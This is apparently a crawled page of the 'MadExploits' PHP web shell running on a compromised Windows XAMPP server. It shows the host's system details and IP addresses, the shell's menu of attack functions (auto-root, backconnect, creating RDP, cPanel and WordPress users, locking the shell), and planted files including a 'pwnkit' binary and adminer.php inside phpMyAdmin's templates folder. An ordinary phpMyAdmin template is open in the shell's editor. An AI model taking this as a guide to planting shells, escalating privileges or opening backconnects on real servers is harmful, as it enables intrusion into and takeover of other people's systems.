Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.124
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
templates /
columns_definitions /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
column_attribute.twig
1021
B
-rw-rw-rw-
column_attributes.twig
13.34
KB
-rw-rw-rw-
column_definitions_form.twig
8.58
KB
-rw-rw-rw-
column_name.twig
1.44
KB
-rw-rw-rw-
partitions.twig
7.96
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
table_fields_definitions.twig
4.76
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : column_attribute.twig
{% if submit_attribute is defined and submit_attribute != false %} {% set attribute = submit_attribute %} {# MariaDB has additional parentheses #} {% elseif column_meta['Extra'] is defined and ('on update current_timestamp' in column_meta['Extra'] or 'on update current_timestamp()' in column_meta['Extra']|lower) %} {% set attribute = 'on update CURRENT_TIMESTAMP' %} {% elseif extracted_columnspec['attribute'] is defined %} {% set attribute = extracted_columnspec['attribute'] %} {% else %} {% set attribute = '' %} {% endif %} {% set attribute = attribute|upper %} <select name="field_attribute[{{ column_number }}]" id="field_{{ column_number }}_{{ ci - ci_offset }}"> {% set cnt_attribute_types = attribute_types|length - 1 %} {% for i in 0..cnt_attribute_types %} <option value="{{ attribute_types[i] }}" {{- attribute == attribute_types[i]|upper ? ' selected="selected"' }}> {{ attribute_types[i] }} </option> {% endfor %} </select>
Close